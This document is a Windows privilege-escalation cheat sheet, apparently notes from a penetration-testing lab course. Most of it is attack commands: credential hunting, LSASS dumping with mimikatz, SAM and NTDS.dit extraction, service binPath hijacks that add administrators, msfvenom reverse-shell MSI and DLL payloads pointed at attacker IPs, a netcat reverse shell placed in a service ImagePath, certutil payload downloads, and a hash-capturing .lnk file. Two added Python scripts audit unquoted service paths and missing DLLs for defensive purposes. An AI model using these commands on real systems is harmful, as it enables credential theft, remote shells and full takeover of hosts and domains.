Windows Privilege Escalation
Initial Enumeration
Searching Files & Creds
Searching files:
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
Search by file name only (print matching file names, not the matching lines):
findstr /SI /M "password" *.xml *.ini *.txt
Search file content (CMD):
findstr /si password *.xml *.ini *.txt *.config
Search file content (PowerShell):
select-string -Path <path>*.txt -Pattern password
Search by file extension (CMD):
where /R C:\ *.config
Search by file extension (PowerShell):
Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
Interesting Files/Directories
Chrome custom dictionary (users sometimes add passwords to it):
gc 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
Unattend.xml (unattended-install answer file)
Sticky Notes:
C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
PowerShell history:
(Get-PSReadLineOption).HistorySavePath
gc (Get-PSReadLineOption).HistorySavePath
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PowerShell credential files:
Credentials collected with Get-Credential and saved with Export-Clixml can be loaded back with Import-Clixml.
runas /savecred /user:inlanefreight\bob "COMMAND HERE"
Saved Credentials:
cmdkey /list
SharpChrome.exe logins /unprotect
Password Managers:
KeePass -> .kdbx database -> keepass2john -> hashcat/john
Mail:
MailSniper
LaZagne:
lazagne.exe all
https://github.com/AlessandroZ/LaZagne
SessionGopher:
Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Target WINLPE-SRV01
Clear-Text Passwords in the Registry
Windows Autologon:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
If autologon is enabled (value 1), the credentials it uses are stored under this key.
PuTTY (saved sessions):
Computer\HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<SESSION NAME>
reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
Wi-Fi Passwords:
netsh wlan show profile
netsh wlan show profile name="Wifi" key=clear
VHDX/VMDK (virtual disk images)
Mount on Linux:
guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk
guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1
Mount on Windows:
Mount-VHD
Misconfiguration
AlwaysInstallElevated (both values must be 1 for MSI packages to install with SYSTEM privileges):
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Exploit:
Import-Module .\PowerUp.ps1
Write-UserAddMSI
Generating an MSI:
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi
Executing the MSI:
msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart
Bypass UAC
Bypass-UAC (tool)
Share with write permission
SCF file on a file share:
Point the icon at a UNC path on the attacker machine:
IconFile=\\10.10.14.3\share\legit.ico
Capture the NetNTLMv2 hash with Responder, Inveigh or InveighZero, then crack it:
hashcat -m 5600
Malicious .lnk file (LnkBomb):
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
Process Monitor
procmon
Network
Interfaces:
ipconfig /all
ARP table:
arp -a
Routing table:
route print
OS and Processes
OS info:
Get-WmiObject Win32_OperatingSystem | select -Property *
Processes (with hosted services):
tasklist /svc
Environment variables:
set
System info:
systeminfo
Patches and updates:
wmic qfe
Get-HotFix | ft -AutoSize
Installed programs:
wmic product get name
Get-WmiObject -Class Win32_Product | select Name, Version
Network connections and listening ports (with owning PID):
netstat -ano
Users and Groups
Logged-in users:
query user
Current user:
echo %USERNAME%
Privileges:
whoami /priv
Group membership:
whoami /groups
All users:
net user
All groups:
net localgroup
Details of a group:
net localgroup administrators
Password policy:
net accounts
Local user descriptions:
Get-LocalUser
Computer description:
Get-WmiObject -Class Win32_OperatingSystem | select Description
Enumerating Protections
Windows Defender:
Get-MpComputerStatus
AppLocker:
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Test AppLocker (is a given binary allowed for a given user?):
Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone
Named Pipe
Pillaging
Installed applications:
dir "C:\Program Files"
Using the registry uninstall keys:
$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize
Installed services
Websites
File Shares
Databases
Directory Services (such as Active Directory, Azure AD, etc.)
Name Servers
Deployment Services
Certificate Authority
Source Code Management Server
Virtualization
Messaging
Monitoring and Logging Systems
Backups
Sensitive Data
Keylogging
Clipboard (Invoke-Clipboard)
Screen Capture
Network Traffic Capture
Previous Audit Reports
User Information
History files and interesting documents (.doc/.docx, .xls/.xlsx, files named password.* or pass.*, etc.)
Roles and Privileges
Web Browsers
Firefox:
%APPDATA%\Mozilla\Firefox\Profiles\<RANDOM>.default-release
copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
CookieExtractor
Chrome:
SharpChromium
Newer Chrome versions keep the cookie database under the Network\ subfolder; copy it to the location Invoke-SharpChromium expects:
copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
Invoke-SharpChromium
IM Clients
Slack/Teams
Windows User Privileges
SeImpersonate and SeAssignPrimaryToken
SeDebugPrivilege
Dump LSASS memory:
procdump.exe -accepteula -ma lsass.exe lsass.dmp
Parse the dump with mimikatz:
mimikatz.exe
log
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Spawn a SYSTEM shell as a child of a SYSTEM process:
tasklist (get the PID of winlogon.exe)
psgetsys.ps1:
.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(16452, "c:\windows\System32\cmd.exe", "")
.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent((Get-Process "lsass").id, "c:\windows\System32\cmd.exe", "")
SeTakeOwnershipPrivilege
Import-Module .\Enable-Privilege.ps1
.\EnableAllTokenPrivs.ps1
Choosing the target file:
Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
Checking file ownership:
cmd /c dir /q 'C:\Department Shares\Private\IT'
Take ownership:
takeown /f 'C:\Department Shares\Private\IT\cred.txt'
Modify the file ACL:
icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F
Windows Group Privileges
Backup Operators
Enable the privilege with the SeBackupPrivilege cmdlets (https://github.com/giuliano108/SeBackupPrivilege):
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Create a shadow copy of C: with diskshadow.exe:
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
Copy NTDS.dit from the shadow copy:
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
Save the registry hives:
reg save HKLM\SYSTEM SYSTEM.SAV
reg save hklm\system C:\temp\system.hive
reg save HKLM\SAM SAM.SAV
reg save hklm\sam C:\temp\sam.hive
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Extracting credentials from NTDS.dit:
Install-Module DSInternals -Force
Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\SYSTEM # or SYSTEM.SAV, depending on the name used when saving the hive above
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
robocopy /B E:\Windows\NTDS .\ntds ntds.dit
Event Log Readers
net localgroup "Event Log Readers"
wevtutil qe Security /rd:true /f:text | Select-String "/user"
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"
DnsAdmins
Generate the DLL:
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
Get info about the DnsAdmins group:
Get-ADGroupMember -Identity DnsAdmins
Set the server-level plugin DLL:
dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll
Restart the DNS service (could be disruptive)
Get the user's SID:
wmic useraccount where name="netadm" get sid
Check permissions on the DNS service:
sc.exe sdshow DNS
Hyper-V Administrators
Print Operators - SeLoadDriverPrivilege
whoami /priv
EnableSeLoadDriverPrivilege.cpp
Build:
cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp
Add the driver reference:
reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"
Enable the privilege and load the driver:
EnableSeLoadDriverPrivilege.exe
Verify the driver is loaded:
.\DriverView.exe /stext drivers.txt
cat drivers.txt | Select-String -pattern Capcom
Use ExploitCapcom:
.\ExploitCapcom.exe
Alternatively use EoPLoadDriver
Clean up:
reg delete HKCU\System\CurrentControlSet\Capcom
Server Operators
Find services that run as SYSTEM, e.g. AppReadiness:
sc qc AppReadiness
Check permissions with PsService:
c:\Tools\PsService.exe security AppReadiness
Change binPath:
sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"
Start the service:
sc start AppReadiness
User Account Control
Checking if UAC is enabled:
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
Checking the UAC level:
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
Checking the Windows version:
[environment]::OSVersion.Version
Reviewing PATH:
cmd /c echo %PATH%
UAC bypass
UACME
UAC bypass by mocking trusted directories
Bypass-UAC
Weak Permissions
Permissive File System ACLs
Use Sharphound.exe audit to search for modifiable service binaries, e.g. SecurityService:
Sharphound.exe audit
Check permissions:
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
Replace the executable:
cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
Restart the service:
sc start SecurityService
Weak Service Permissions
Run:
Sharphound.exe audit
Use accesschk to review the permissions on a service:
accesschk.exe /accepteula -quvcw WindscribeService
Change binpath:
sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"
Stop the service:
sc stop WindscribeService
Restart:
sc start WindscribeService
Reverting:
sc config WindScribeService binpath="c:\Program Files (x86)\Windscribe\WindscribeService.exe"
sc start WindScribeService
Unquoted Service Paths
Querying a service:
sc qc SystemExplorerHelpService
Searching for unquoted service paths (auto-start, outside C:\Windows, no quotes):
wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
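The findstr chain above only lists candidates; it does not say which intermediate binaries Windows would try before the real one, nor which directories therefore need an ACL review. The script below is an added example (not code from the original cheat sheet) that applies the CreateProcess rule for unquoted command lines (split at each space, append .exe to a fragment without an extension) and emits, per flagged service, the paths tried first, the directories to check with icacls, and the corrected `sc config` line. It assumes the CSV layout of `wmic service get name,pathname,startmode /format:csv`; the sample rows are constructed, not captured.

```python
"""Audit service binary paths for the unquoted-path weakness. Added example, not
part of the original cheat sheet. It expects the CSV form of the wmic command
above (`wmic service get name,pathname,startmode /format:csv`, an assumption
about wmic's CSV layout); the sample below is constructed, not captured."""
import csv
import io
import ntpath

SAMPLE_WMIC_CSV = """
Node,Name,PathName,StartMode
WINLPE-SRV01,SystemExplorerHelpService,C:\\Program Files (x86)\\System Explorer\\service\\SystemExplorerService64.exe,Auto
WINLPE-SRV01,WinDefend,"C:\\Program Files\\Windows Defender\\MsMpEng.exe",Auto
WINLPE-SRV01,Spooler,C:\\WINDOWS\\System32\\spoolsv.exe,Auto
WINLPE-SRV01,Dhcp,C:\\WINDOWS\\system32\\svchost.exe -k LocalServiceNetworkRestricted -p,Auto
WINLPE-SRV01,LegacyBackup,C:\\Backup Tools\\agent.exe --service,Manual
"""


def candidate_binaries(pathname):
    """Executables Windows may try, in order, before the intended one.
    CreateProcess splits an unquoted command line at every space and appends
    .exe to a fragment without an extension; a quoted path yields nothing."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        return []
    tokens = pathname.split(' ')
    candidates = []
    for i, token in enumerate(tokens, start=1):
        fragment = ' '.join(tokens[:i])
        leaf = fragment.rsplit('\\', 1)[-1]
        candidates.append(fragment if '.' in leaf else fragment + '.exe')
        if token.lower().endswith('.exe'):
            break  # everything after the binary is arguments
    return candidates


def audit_unquoted(wmic_csv):
    """Map service name -> finding for services outside C:\\Windows whose
    unquoted path gives Windows more than one binary to try."""
    lines = [l for l in io.StringIO(wmic_csv) if l.strip()]  # wmic emits a leading blank line
    rows = csv.DictReader(lines, quoting=csv.QUOTE_NONE)      # wmic never quotes fields; keep the path's own quotes
    findings = {}
    for row in rows:
        name, path = row['Name'], row['PathName'].strip()
        if path.lower().startswith('c:\\windows\\'):
            continue  # same exclusion as the findstr chain above
        cands = candidate_binaries(path)
        if len(cands) < 2:
            continue  # quoted, or no space before the binary name
        exe, args = cands[-1], path[len(cands[-1]):]
        findings[name] = {
            'startmode': row['StartMode'],
            'tried_first': cands[:-1],
            'dirs_to_check': sorted({ntpath.dirname(c) for c in cands[:-1]}),
            'fix': f'sc config {name} binPath= "\\"{exe}\\"{args}"',
        }
    return findings


if __name__ == '__main__':
    for name, f in audit_unquoted(SAMPLE_WMIC_CSV).items():
        print(name, f['startmode'])
        print('  tried first :', f['tried_first'])
        print('  check ACLs  :', f['dirs_to_check'])
        print('  fix         :', f['fix'])
```

A finding is only exploitable if one of the listed directories is writable by a low-privileged user, which is what the icacls check answers; either way, quoting the path with the suggested `sc config` line removes the ambiguity.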
Permissive Registry ACLs
Checking for weak service ACLs in the registry:
accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services
Changing ImagePath with PowerShell:
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
Modifiable Registry Autorun Binary
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#privilege-escalation-with-autoruns
Kernel Exploits
List of Windows vulnerabilities: https://msrc.microsoft.com/update-guide/vulnerability
wmic qfe list brief
Watson
Wesng
Vulnerable Services
Enumerate installed programs:
wmic product get name
Enumerate local ports:
netstat -ano | findstr 6064
Enumerate a process by ID:
get-process -Id 3324
Enumerate running services:
get-service | ? {$_.DisplayName -like 'Druva*'}
Modifying the PowerShell execution policy:
Set-ExecutionPolicy Bypass -Scope Process
Process Injection
LOLBAS
Collection: LOLBAS
Transfer a file:
certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat
Encoding a file:
certutil -encode file1 encodedfile
Decoding a file:
certutil -decode encodedfile file2
Execute a DLL:
rundll32.exe
Scheduled Tasks
Enumerating:
schtasks /query /fo LIST /v
Get-ScheduledTask | select TaskName,State
DLL Injection/Hijacking
DLL injection is a method that involves inserting a piece of code, structured as a Dynamic Link Library (DLL), into a running process, i.e. executing an arbitrary DLL inside another process. The classic sequence of Win32 calls:
1. Locate the target process: CreateToolhelp32Snapshot, Process32First, Process32Next
2. Open the process: GetModuleHandle, GetProcAddress, OpenProcess
3. Write the path of the DLL into the process: VirtualAllocEx, WriteProcessMemory
4. Create a thread in the process that loads the DLL: CreateRemoteThread with LoadLibrary as the start routine (alternatives: NtCreateThreadEx, RtlCreateUserThread)
Other approaches: LoadLibrary, Manual Mapping
Resources
DLL Injection Hacktips
IredTeam DLL Injection
DLL Hijacking
DLL hijacking is an exploitation technique where an attacker capitalizes on the Windows DLL loading process. Variants:
DLL replacement: replace a legitimate DLL with an evil DLL, usually combined with DLL proxying.
DLL search order hijacking: place the evil DLL in a location that is searched before the one holding the real DLL.
Phantom DLL hijacking: drop an evil DLL in place of a missing/non-existent DLL that a legitimate application tries to load.
DLL redirection: change the location in which the DLL is searched for, e.g. by editing the %PATH% environment variable or via .exe.manifest/.exe.local files.
WinSxS DLL replacement: replace the legitimate DLL with the evil DLL in the relevant WinSxS folder of the targeted DLL (often called DLL side-loading).
Relative path DLL hijacking: copy the legitimate application to a user-writable folder, alongside the evil DLL.
Finding missing DLLs
procmon -> Filter -> Result contains NOT FOUND and Path ends with .dll
To escalate privileges:
Identify a process that runs, or will run, under different privileges (horizontal or lateral movement) and is missing a DLL.
Ensure write access is available for any directory in which the DLL will be searched for:
icacls "Path-To-Dir"
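The Procmon filter and the icacls check above are usually done by hand, one event at a time. The script below is an added example (not code from the original page) that applies the same filter to a Procmon CSV export, groups the misses per process in the order the loader tried them, and keeps only those whose directory is in a set of directories the icacls check found writable. The column names are those of Procmon's default CSV export; the rows and the writable-directory set are constructed (the srrstr.dll path reuses the one shown later on this page).

```python
"""Triage a Procmon CSV export for DLL loads that fell through to a directory
the current user can write to. Added example, not part of the original page;
the columns are those of Procmon's default CSV export and the rows below are
constructed (the srrstr.dll path is the one used later on this page)."""
import csv
import io
import ntpath

SAMPLE_PROCMON_CSV = '''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:12:01.0000001 AM","SRService.exe","3324","CreateFile","C:\\Program Files\\System Restore Service\\srrstr.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:12:01.0000002 AM","SRService.exe","3324","CreateFile","C:\\Windows\\System32\\srrstr.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:12:01.0000003 AM","SRService.exe","3324","CreateFile","C:\\Users\\sarah\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:12:01.0000004 AM","SRService.exe","3324","CreateFile","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Desired Access: Read Attributes"
"10:12:02.0000001 AM","explorer.exe","4412","CreateFile","C:\\Users\\sarah\\Documents\\notes.txt","NAME NOT FOUND","Desired Access: Read Attributes"
"10:12:03.0000001 AM","svchost.exe","900","CreateFile","C:\\Windows\\System32\\plugin.dll","NAME NOT FOUND","Desired Access: Read Attributes"
'''


def missing_dlls(procmon_csv):
    """Apply the page's Procmon filter (Result contains NOT FOUND, Path ends
    with .dll) and group the paths, in loader search order, by (process, pid)."""
    groups = {}
    for row in csv.DictReader(io.StringIO(procmon_csv)):
        if 'NOT FOUND' not in row['Result'] or not row['Path'].lower().endswith('.dll'):
            continue
        groups.setdefault((row['Process Name'], int(row['PID'])), []).append(row['Path'])
    return groups


def exposed_loads(groups, writable_dirs):
    """Keep only misses whose directory is one the current user can write to.
    writable_dirs is the set of directories the icacls check reported as writable."""
    writable = {d.rstrip('\\').lower() for d in writable_dirs}
    hits = []
    for (proc, pid), paths in groups.items():
        for p in paths:
            if ntpath.dirname(p).lower() in writable:
                hits.append((proc, pid, p))
    return hits


if __name__ == '__main__':
    groups = missing_dlls(SAMPLE_PROCMON_CSV)
    for (proc, pid), paths in groups.items():
        print(f'{proc} ({pid}) looked for and did not find:')
        for p in paths:
            print('   ', p)
    # Constructed: the only directory icacls reported as writable for the current user.
    writable = {'C:\\Users\\sarah\\AppData\\Local\\Microsoft\\WindowsApps'}
    for proc, pid, p in exposed_loads(groups, writable):
        print(f'EXPOSED: {proc} ({pid}) would load {p}')
```

Each hit is a phantom-DLL load that needs fixing: restrict the directory's ACL, remove it from the search path, or have the application load the library by full path. Misses in protected directories earlier in the search order (Program Files, System32 in the sample) are worth listing too, because they show where the loader looks before it reaches the writable one.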
Tools
winPEAS
PowerSploit: Find-ProcessDLLHijack, Find-PathDLLHijack and Write-HijackDll
Resources
DLL Hijacking Hacktricks
DLL Hijacking PrivEsc
hijacking-dlls-in-windows
tcapt-dll-hijacking
DLL Hijacking
Reflective DLL Injection
Resources
Reflective DLL Injection
DLL Side-Loading
Resources
dll-sideloading-proxying
DLL Proxying
A DLL proxy is a DLL that runs your code when loaded but also behaves as expected by forwarding every exported call to the real library.
Get a reverse shell (N.B. the architecture of the target process matters):
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f dll -o injection.dll
msfvenom -p windows/shell_reverse_tcp LHOST=172.23.150.167 LPORT=4444 -f dll > injection.dll
msfconsole -> use multi/handler
Write the code
How to compile the DLL
x64:
x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
x86:
i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
Link against Windows Sockets 2 (ws2_32), necessary for a reverse shell:
i686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared
Alternatively use Visual Studio and C#
How to test the DLL:
rundll32.exe shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll
rundll32.exe injection.dll,0
Tools
Procmon
Process Explorer
Visual Studio